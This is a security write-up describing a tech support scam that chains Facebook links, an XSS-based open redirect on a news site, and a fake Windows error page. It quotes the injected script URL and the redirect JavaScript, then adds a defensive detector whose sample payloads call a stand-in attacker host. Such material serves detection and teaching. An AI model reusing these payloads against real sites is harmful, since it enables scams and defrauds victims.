Researchers at Malwarebytes Labs reported that threat actors have recently been detected using links from Facebook to entice individuals to click through a series of browser redirections that ultimately lead to a tech support scam website simulating a Windows error screen. Victims who end up on the error screen are asked to call a toll-free number that purports to be Microsoft Tech Support. The threat actors pretend to be associated with Microsoft and attempt to scam money from victims in exchange for remotely accessing the victim’s computer to “fix” the supposed issue.

One interesting aspect of this attack is that the attackers made use of a legitimate website with a cross-site scripting (XSS) vulnerability, which allowed JavaScript to be injected and the site to be used as an open redirect to another URL. The URL used was the following:
rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}
The JavaScript that was downloaded from buddhosi[.]com was the following:
top.location.replace('https://BernetteJudeTews[.]club/home/anette/?nr=855-472-1832&'+window.location.search.substring(1));
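
For defenders reviewing proxy or web-server logs, the following added example (not code from Malwarebytes or from the original report) flags request URLs whose query parameters carry a script tag with a src attribute, as in the URL above, and notes whether that src points off-site. The sample URLs are constructed and use reserved .example domains, and the names fullyDecode and findInjectedScripts are hypothetical.

```javascript
// Added example. SAMPLE_URLS are constructed (reserved .example domains) and
// mirror the shape of the reported URL: a search parameter carrying <script src=...>.
const SAMPLE_URLS = [
  "https://news.example/buscar?q=hoy%3Cscript%20src=%27https://cdn.attacker.example/210c/?x.js%27%3E%3C/script%3E&fbclid=abc123",
  "https://news.example/buscar?q=hoy+deportes&fbclid=abc123",
  "https://news.example/buscar?q=%253Cscript%2520src%253D%2F%2Fcdn.attacker.example%2Fx.js%253E",
  "https://news.example/buscar?q=%3Cscript%20src=%22/static/app.js%22%3E%3C/script%3E",
];

// Decode repeatedly (bounded) so double-encoded payloads are normalised too.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // malformed %-escape
    if (next === current) break;
    current = next;
  }
  return current;
}

// Matches <script ... src=VALUE> with double, single or no quotes around VALUE.
const SCRIPT_SRC = /<\s*script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Returns one finding per script tag found inside any query parameter.
function findInjectedScripts(urlString) {
  const page = new URL(urlString);
  const findings = [];
  for (const [param, raw] of page.searchParams) { // searchParams decodes once
    const value = fullyDecode(raw);
    for (const m of value.matchAll(SCRIPT_SRC)) {
      const src = m[1] ?? m[2] ?? m[3];
      let host = null;
      try { host = new URL(src, page).host; } catch { /* unparsable src */ }
      // crossOrigin: the script would be loaded from a host other than the page's.
      findings.push({ param, src, host, crossOrigin: host !== null && host !== page.host });
    }
  }
  return findings;
}

for (const u of SAMPLE_URLS) {
  console.log(findInjectedScripts(u));
}
```

A script tag inside a query parameter is worth alerting on even when its src is same-origin; the crossOrigin field only helps rank the findings.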